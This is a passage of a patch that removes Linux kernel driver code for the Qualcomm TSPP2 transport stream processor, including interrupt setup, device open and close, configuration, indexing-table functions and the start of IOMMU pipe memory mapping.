TSPP2_UNEXPECTED_RST_IRQ_CLEAR); -- writel_relaxed(0x7FFFFFFF, -- device->base + TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR); -- writel_relaxed(0x7FFFFFFF, -- device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR); -- writel_relaxed(0xFFFFFFFF, -- device->base + TSPP2_KEY_NOT_READY_IRQ_CLEAR); -- -- /* -- * Global interrupts configuration: -- * Flow Control (per memory source): Disabled -- * Read Failure (per memory source): Enabled -- * SC_GO_LOW 
(aggregate): Enabled
-- * SC_GO_HIGH (aggregate): Enabled
-- * Wrong Pipe Direction (aggregate): Enabled
-- * QSB Response Error (aggregate): Enabled
-- * Unexpected Reset (aggregate): Enabled
-- * Key Not Ready (aggregate): Disabled
-- * Op Encrypt Level Error: Enabled
-- * PES No Sync: Disabled (module parameter)
-- * TSP Invalid Length: Disabled (module parameter)
-- * TSP Invalid AF Control: Disabled (module parameter)
-- */
-- global_irq_en = 0x00FF03E8;
-- if (tspp2_en_invalid_af_ctrl)
-- global_irq_en |=
-- (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
-- if (tspp2_en_invalid_af_length)
-- global_irq_en |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
-- if (tspp2_en_pes_no_sync)
-- global_irq_en |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
--
-- if (enable_intr)
-- writel_relaxed(global_irq_en,
-- device->base + TSPP2_GLOBAL_IRQ_ENABLE);
-- else
-- writel_relaxed(0, device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
-- if (enable_intr) {
-- /* Enable all pipe related interrupts */
-- writel_relaxed(0x7FFFFFFF,
-- device->base + TSPP2_UNEXPECTED_RST_IRQ_ENABLE);
-- writel_relaxed(0x7FFFFFFF,
-- device->base + TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE);
-- writel_relaxed(0x7FFFFFFF,
-- device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE);
-- } else {
-- /* Disable all pipe related interrupts */
-- writel_relaxed(0,
-- device->base + TSPP2_UNEXPECTED_RST_IRQ_ENABLE);
-- writel_relaxed(0,
-- device->base + TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE);
-- writel_relaxed(0,
-- device->base + TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE);
-- }
--
-- /* Disable Key Ladder interrupts */
-- writel_relaxed(0, device->base + TSPP2_KEY_NOT_READY_IRQ_ENABLE);
--
-- /*
-- * Clear and disable scrambling control interrupts.
-- * Each register handles 32 filters.
-- */
-- for (i = 0; i < 4; i++) {
-- writel_relaxed(0xFFFFFFFF,
-- device->base + TSPP2_SC_GO_HIGH_CLEAR(i));
-- writel_relaxed(0, device->base + TSPP2_SC_GO_HIGH_ENABLE(i));
-- writel_relaxed(0xFFFFFFFF,
-- device->base + TSPP2_SC_GO_LOW_CLEAR(i));
-- writel_relaxed(0, device->base + TSPP2_SC_GO_LOW_ENABLE(i));
-- }
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_event_work_handler - Handle the work - invoke the user callback.
-- *
-- * @work: The work information.
-- */
--static void tspp2_event_work_handler(struct work_struct *work)
--{
-- struct tspp2_event_work *event_work =
-- container_of(work, struct tspp2_event_work, work);
-- struct tspp2_event_work cb_info = *event_work;
--
-- if (mutex_lock_interruptible(&event_work->device->mutex))
-- return;
--
-- list_add_tail(&event_work->link, &event_work->device->free_work_list);
--
-- mutex_unlock(&event_work->device->mutex);
--
-- /*
-- * Must run callback with tspp2 device mutex unlocked,
-- * as callback might call tspp2 driver API and cause a deadlock.
-- */
-- if (cb_info.callback)
-- cb_info.callback(cb_info.cookie, cb_info.event_bitmask);
--}
--
--/**
-- * tspp2_device_initialize() - Initialize TSPP2 device SW structures.
-- *
-- * @device: TSPP2 device
-- *
-- * Initialize the required SW structures and fields in the TSPP2 device,
-- * including ION client creation, BAM registration, debugfs initialization etc.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_device_initialize(struct tspp2_device *device)
--{
-- int i, ret;
--
-- if (!device) {
-- pr_err("%s: NULL device\n", __func__);
-- return -ENODEV;
-- }
--
-- /* Register BAM */
-- device->bam_props.summing_threshold = 0x10;
-- device->bam_props.irq = device->bam_irq;
-- device->bam_props.manage = SPS_BAM_MGR_LOCAL;
--
-- ret = sps_register_bam_device(&device->bam_props, &device->bam_handle);
-- if (ret) {
-- pr_err("%s: failed to register BAM\n", __func__);
-- return ret;
-- }
-- ret = sps_device_reset(device->bam_handle);
-- if (ret) {
-- sps_deregister_bam_device(device->bam_handle);
-- pr_err("%s: error resetting BAM\n", __func__);
-- return ret;
-- }
--
-- spin_lock_init(&device->spinlock);
-- wakeup_source_init(&device->wakeup_src, dev_name(&device->pdev->dev));
--
-- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
-- tspp2_tsif_debugfs_init(&device->tsif_devices[i]);
--
-- /*
-- * The device structure was allocated using devm_kzalloc() so
-- * the memory was initialized to zero. We don't need to specifically set
-- * fields to zero, then. We only set the fields we need to, such as
-- * batch_id.
-- */
--
-- for (i = 0; i < TSPP2_NUM_BATCHES; i++) {
-- device->batches[i].batch_id = i;
-- device->batches[i].src = NULL;
-- INIT_LIST_HEAD(&device->batches[i].link);
-- }
--
-- /*
-- * We set the device back-pointer in the sources, filters and pipes
-- * databases here, so that back-pointer is always valid (instead of
-- * setting it when opening a source, filter or pipe).
-- */
-- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
-- device->tsif_sources[i].device = device;
--
-- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++)
-- device->mem_sources[i].device = device;
--
-- for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
-- device->filters[i].device = device;
--
-- for (i = 0; i < TSPP2_NUM_PIPES; i++)
-- device->pipes[i].device = device;
--
-- /*
-- * Note: tsif_devices are initialized as part of tspp2_global_hw_reset()
-- */
--
-- device->work_queue =
-- create_singlethread_workqueue(dev_name(device->dev));
-- INIT_LIST_HEAD(&device->free_work_list);
-- for (i = 0; i < TSPP2_NUM_EVENT_WORK_ELEMENTS; i++) {
-- device->work_pool[i].device = device;
-- device->work_pool[i].callback = 0;
-- device->work_pool[i].cookie = 0;
-- device->work_pool[i].event_bitmask = 0;
-- INIT_LIST_HEAD(&device->work_pool[i].link);
-- INIT_WORK(&device->work_pool[i].work,
-- tspp2_event_work_handler);
--
-- list_add_tail(&device->work_pool[i].link,
-- &device->free_work_list);
-- }
--
-- device->event_callback = NULL;
-- device->event_cookie = NULL;
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_device_uninitialize() - TSPP2 device teardown and cleanup.
-- *
-- * @device: TSPP2 device
-- *
-- * TSPP2 device teardown: debugfs removal, BAM de-registration etc.
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_device_uninitialize(struct tspp2_device *device)
--{
-- int i;
--
-- if (!device) {
-- pr_err("%s: NULL device\n", __func__);
-- return -ENODEV;
-- }
--
-- destroy_workqueue(device->work_queue);
--
-- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++)
-- tspp2_tsif_debugfs_exit(&device->tsif_devices[i]);
--
-- /* Need to start clocks for BAM de-registration */
-- if (pm_runtime_get_sync(device->dev) >= 0) {
-- sps_deregister_bam_device(device->bam_handle);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- }
--
-- wakeup_source_trash(&device->wakeup_src);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_src_disable_internal() - Helper function to disable a source.
-- *
-- * @src: Source to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_src_disable_internal(struct tspp2_src *src)
--{
-- u32 reg;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- return -EINVAL;
-- }
--
-- if (!src->enabled) {
-- pr_warn("%s: Source already disabled\n", __func__);
-- return 0;
-- }
--
-- if ((src->input == TSPP2_INPUT_TSIF0) ||
-- (src->input == TSPP2_INPUT_TSIF1)) {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- reg &= ~(0x1 << TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--
-- tspp2_tsif_stop(&src->device->tsif_devices[src->input]);
-- } else {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- }
--
-- /*
-- * HW requires we wait for up to 2ms here before closing the pipes
-- * attached to (and used by) this
source
-- */
-- udelay(TSPP2_HW_DELAY_USEC);
--
-- src->enabled = 0;
-- src->device->num_enabled_sources--;
--
-- if (src->device->num_enabled_sources == 0) {
-- __pm_relax(&src->device->wakeup_src);
-- tspp2_clock_stop(src->device);
-- }
--
-- return 0;
--}
--
--/* TSPP2 device open / close API */
--
--/**
-- * tspp2_device_open() - Open a TSPP2 device for use.
-- *
-- * @dev_id: TSPP2 device ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_device_open(u32 dev_id)
--{
-- int rc;
-- u32 reg = 0;
-- struct tspp2_device *device;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- if (mutex_lock_interruptible(&device->mutex))
-- return -ERESTARTSYS;
--
-- if (device->opened) {
-- pr_err("%s: Device already opened\n", __func__);
-- mutex_unlock(&device->mutex);
-- return -EPERM;
-- }
--
-- /* Enable power regulator */
-- rc = regulator_enable(device->gdsc);
-- if (rc)
-- goto err_mutex_unlock;
--
-- /* Reset TSPP2 core */
-- clk_reset(device->tspp2_core_clk, CLK_RESET_ASSERT);
-- udelay(10);
-- clk_reset(device->tspp2_core_clk, CLK_RESET_DEASSERT);
--
-- /* Start HW clocks before accessing registers */
-- rc = tspp2_reg_clock_start(device);
-- if (rc)
-- goto err_regulator_disable;
--
-- rc = tspp2_global_hw_reset(device, 1);
-- if (rc)
-- goto err_stop_clocks;
--
-- rc = tspp2_device_initialize(device);
-- if (rc)
-- goto err_stop_clocks;
--
-- reg = readl_relaxed(device->base + TSPP2_VERSION);
-- pr_info("TSPP2 HW Version: Major = %d, Minor = %d, Step = %d\n",
-- ((reg & 0xF0000000) >> VERSION_MAJOR_OFFS),
-- ((reg & 0x0FFF0000) >> VERSION_MINOR_OFFS),
-- ((reg & 0x0000FFFF) >> VERSION_STEP_OFFS));
--
-- /* Stop HW clocks to save power */
-- tspp2_reg_clock_stop(device);
--
-- /* Enable runtime power management */
--
pm_runtime_set_autosuspend_delay(device->dev, MSEC_PER_SEC);
-- pm_runtime_use_autosuspend(device->dev);
-- pm_runtime_enable(device->dev);
--
-- device->opened = 1;
--
-- mutex_unlock(&device->mutex);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_stop_clocks:
-- tspp2_reg_clock_stop(device);
--err_regulator_disable:
-- regulator_disable(device->gdsc);
--err_mutex_unlock:
-- mutex_unlock(&device->mutex);
--
-- return rc;
--}
--EXPORT_SYMBOL(tspp2_device_open);
--
--/**
-- * tspp2_device_close() - Close a TSPP2 device.
-- *
-- * @dev_id: TSPP2 device ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_device_close(u32 dev_id)
--{
-- int i;
-- int ret = 0;
-- struct tspp2_device *device;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&device->mutex);
--
-- if (!device->opened) {
-- pr_err("%s: Device already closed\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
-- device->opened = 0;
--
-- /*
-- * In case the user has not disabled all the enabled sources, we need
-- * to disable them here, specifically in order to call tspp2_clock_stop,
-- * because the calls to enable and disable the clocks should be
-- * symmetrical (otherwise we cannot put the clocks).
-- */
-- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
-- if (device->tsif_sources[i].enabled)
-- tspp2_src_disable_internal(&device->tsif_sources[i]);
-- }
-- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
-- if (device->mem_sources[i].enabled)
-- tspp2_src_disable_internal(&device->mem_sources[i]);
-- }
--
-- /* bring HW registers back to a known state */
-- tspp2_global_hw_reset(device, 0);
--
-- tspp2_device_uninitialize(device);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- /* Disable runtime power management */
-- pm_runtime_disable(device->dev);
-- pm_runtime_set_suspended(device->dev);
--
-- if (regulator_disable(device->gdsc))
-- pr_err("%s: Error disabling power regulator\n", __func__);
--
-- mutex_unlock(&device->mutex);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_device_close);
--
--/* Global configuration API */
--
--/**
-- * tspp2_config_set() - Set device global configuration.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @cfg: TSPP2 global configuration parameters to set.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_config_set(u32 dev_id, const struct tspp2_config *cfg)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_device *device;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (!cfg) {
-- pr_err("%s: NULL configuration\n", __func__);
-- return -EINVAL;
-- }
-- if (cfg->stc_byte_offset > 3) {
-- pr_err("%s: Invalid stc_byte_offset %d, valid values are 0 - 3\n",
-- __func__, cfg->stc_byte_offset);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- if (cfg->pcr_on_discontinuity)
-- reg |= (0x1 << PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS);
--
-- reg |= (cfg->stc_byte_offset << PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS);
-- reg |= (cfg->min_pcr_interval << PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS);
--
-- writel_relaxed(reg, device->base + TSPP2_PCR_GLOBAL_CONFIG);
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_config_set);
--
--/**
-- * tspp2_config_get() - Get current global configuration.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @cfg: TSPP2 global configuration parameters.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_config_get(u32 dev_id, struct tspp2_config *cfg)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_device *device;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (!cfg) {
-- pr_err("%s: NULL configuration\n", __func__);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- reg = readl_relaxed(device->base + TSPP2_PCR_GLOBAL_CONFIG);
--
-- cfg->pcr_on_discontinuity = ((reg & PCR_GLOBAL_CONFIG_PCR_ON_DISCONT) >>
-- PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS);
-- cfg->stc_byte_offset = ((reg & PCR_GLOBAL_CONFIG_STC_OFFSET) >>
-- PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS);
-- cfg->min_pcr_interval = ((reg & PCR_GLOBAL_CONFIG_PCR_INTERVAL) >>
-- PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS);
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_config_get);
--
--/* Indexing tables API functions */
--
--/**
-- * tspp2_indexing_prefix_set() - Set prefix value and mask of an indexing table.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @table_id: Indexing table ID.
-- * @value: Prefix 4-byte value.
-- * @mask: Prefix 4-byte mask.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_prefix_set(u32 dev_id,
-- u8 table_id,
-- u32 value,
-- u32 mask)
--{
-- int ret;
-- u32 reg;
-- u8 size = 0;
-- int i;
-- struct tspp2_device *device;
-- struct tspp2_indexing_table *table;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
-- pr_err("%s: Invalid table ID %d\n", __func__, table_id);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- table = &device->indexing_tables[table_id];
-- table->prefix_value = value;
-- table->prefix_mask = mask;
--
-- /* HW expects values/masks to be written in Big Endian format */
-- writel_relaxed(cpu_to_be32(value),
-- device->base + TSPP2_INDEX_TABLE_PREFIX(table_id));
-- writel_relaxed(cpu_to_be32(mask),
-- device->base + TSPP2_INDEX_TABLE_PREFIX_MASK(table_id));
--
-- /* Find the actual size of the prefix and set to HW */
-- reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
-- for (i = 0; i < 32; i += 8) {
-- if (mask & (0x000000FF << i))
-- size++;
-- }
-- reg &= ~(0x7 << INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS);
-- reg |= (size << INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS);
-- writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
--
dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_prefix_set);
--
--/**
-- * tspp2_indexing_patterns_add() - Add patterns to an indexing table.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @table_id: Indexing table ID.
-- * @values: An array of 4-byte pattern values.
-- * @masks: An array of corresponding 4-byte masks.
-- * @patterns_num: Number of patterns in the values / masks arrays.
-- * Up to TSPP2_NUM_INDEXING_PATTERNS.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_patterns_add(u32 dev_id,
-- u8 table_id,
-- const u32 *values,
-- const u32 *masks,
-- u8 patterns_num)
--{
-- int ret;
-- int i;
-- u16 offs = 0;
-- u32 reg;
-- struct tspp2_device *device;
-- struct tspp2_indexing_table *table;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
-- pr_err("%s: Invalid table ID %d\n", __func__, table_id);
-- return -EINVAL;
-- }
-- if (!values || !masks) {
-- pr_err("%s: NULL values or masks array\n", __func__);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- table = &device->indexing_tables[table_id];
--
-- if ((table->num_valid_entries + patterns_num) >
-- TSPP2_NUM_INDEXING_PATTERNS) {
-- pr_err("%s: Trying to add too many patterns: current number %d, trying to add %d, maximum allowed
%d\n",
-- __func__, table->num_valid_entries, patterns_num,
-- TSPP2_NUM_INDEXING_PATTERNS);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EINVAL;
-- }
--
-- /* There's enough room to add all the requested patterns */
-- offs = table->num_valid_entries;
-- for (i = 0; i < patterns_num; i++) {
-- table->entry_value[offs + i] = values[i];
-- table->entry_mask[offs + i] = masks[i];
-- writel_relaxed(cpu_to_be32(values[i]),
-- device->base +
-- TSPP2_INDEX_TABLE_PATTEREN(table_id, offs + i));
-- writel_relaxed(cpu_to_be32(masks[i]), device->base +
-- TSPP2_INDEX_TABLE_MASK(table_id, offs + i));
-- }
-- table->num_valid_entries += patterns_num;
-- reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
-- reg &= ~(0x1F << INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
-- reg |= (table->num_valid_entries <<
-- INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
-- writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_patterns_add);
--
--/**
-- * tspp2_indexing_patterns_clear() - Clear all patterns of an indexing table.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @table_id: Indexing table ID.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_indexing_patterns_clear(u32 dev_id,
-- u8 table_id)
--{
-- int ret;
-- int i;
-- u32 reg;
-- struct tspp2_device *device;
-- struct tspp2_indexing_table *table;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (table_id >= TSPP2_NUM_INDEXING_TABLES) {
-- pr_err("%s: Invalid table ID %d\n", __func__, table_id);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- table = &device->indexing_tables[table_id];
--
-- for (i = 0; i < table->num_valid_entries; i++) {
-- table->entry_value[i] = 0;
-- table->entry_mask[i] = 0;
-- writel_relaxed(0, device->base +
-- TSPP2_INDEX_TABLE_PATTEREN(table_id, i));
-- writel_relaxed(0, device->base +
-- TSPP2_INDEX_TABLE_MASK(table_id, i));
--
-- }
-- table->num_valid_entries = 0;
-- reg = readl_relaxed(device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
-- reg &= ~(0x1F << INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS);
-- writel_relaxed(reg, device->base + TSPP2_INDEX_TABLE_PARAMS(table_id));
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_indexing_patterns_clear);
--
--/* Pipe API functions */
--
--/**
-- * tspp2_pipe_memory_init() - Initialize pipe memory helper function.
-- *
-- * @pipe: The pipe to work on.
-- *
-- * The user is responsible for allocating the pipe's memory buffer via ION.
-- * This helper function maps the given buffer to TSPP2 IOMMU memory space,
-- * and sets the pipe's secure bit.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pipe_memory_init(struct tspp2_pipe *pipe)
--{
-- int ret = 0;
-- u32 reg;
-- size_t align;
-- unsigned long dummy_size = 0;
-- size_t len = 0;
-- int domain = 0;
-- int partition = 0;
-- int hlos_group_attached = 0;
-- int cpz_group_attached = 0;
-- int vbif_clk_started = 0;
--
-- if (pipe->cfg.is_secure) {
-- domain = pipe->device->iommu_info.cpz_domain_num;
-- partition = pipe->device->iommu_info.cpz_partition;
-- align = SZ_1M;
-- } else {
-- domain = pipe->device->iommu_info.hlos_domain_num;
-- partition = pipe->device->iommu_info.hlos_partition;
-- align = SZ_4K;
-- }
--
-- if (tspp2_iommu_bypass) {
-- ret = ion_phys(pipe->cfg.ion_client,
-- pipe->cfg.buffer_handle, &pipe->iova, &len);
--
-- dummy_size = 0;
--
-- if (ret) {
-- pr_err("%s: Failed to get buffer physical address, ret = %d\n",
-- __func__, ret);
-- return ret;
-- }
--
-- if ((pipe->device->num_secured_opened_pipes +
-- pipe->device->num_non_secured_opened_pipes) == 0) {
-- ret = tspp2_vbif_clock_start(pipe->device);
-- if (ret) {
-- pr_err(
-- "%s: tspp2_vbif_clock_start failed, ret=%d\n",
-- __func__, ret);
-- return ret;
-- }
-- vbif_clk_started = 1;
-- }
-- } else {
-- /*
-- * We need to attach the group to enable the IOMMU and support
-- * the required memory mapping. This needs to be done before
-- * the first mapping is performed, so the number of opened pipes
-- * (of each type: secure or non-secure) is used as a
-- * reference count. Note that since the pipe descriptors are
-- * always allocated from HLOS domain, the HLOS group must be
-- * attached regardless of the pipe's security configuration.
-- * The mutex is taken at this point so there is no problem with
-- * synchronization.
-- */
-- if ((pipe->device->num_secured_opened_pipes +
-- pipe->device->num_non_secured_opened_pipes) == 0) {
-- ret = tspp2_vbif_clock_start(pipe->device);
-- if (ret) {
-- pr_err("%s: tspp2_vbif_clock_start failed, ret=%d\n",
-- __func__, ret);
-- goto err_out;
-- }
-- vbif_clk_started = 1;
--
-- pr_debug("%s: attaching HLOS group\n", __func__);
-- ret = iommu_attach_group(
-- pipe->device->iommu_info.hlos_domain,
-- pipe->device->iommu_info.hlos_group);
--
-- if (ret) {
-- pr_err("%s: Failed attaching IOMMU HLOS group, %d\n",
-- __func__, ret);
-- goto err_out;
-- }
-- hlos_group_attached = 1;
-- }
--
-- if (pipe->cfg.is_secure &&
-- (pipe->device->num_secured_opened_pipes == 0)) {
-- pr_debug("%s: attaching CPZ group\n", __func__);
-- ret = iommu_attach_group(
-- pipe->device->iommu_info.cpz_domain,
-- pipe->device->iommu_info.cpz_group);
--
-- if (ret) {
-- pr_err("%s: Failed attaching IOMMU CPZ group, %d\n",
-- __func__, ret);
-- goto err_out;
-- }
-- cpz_group_attached = 1;
-- }
--
-- /* Map to TSPP2 IOMMU */
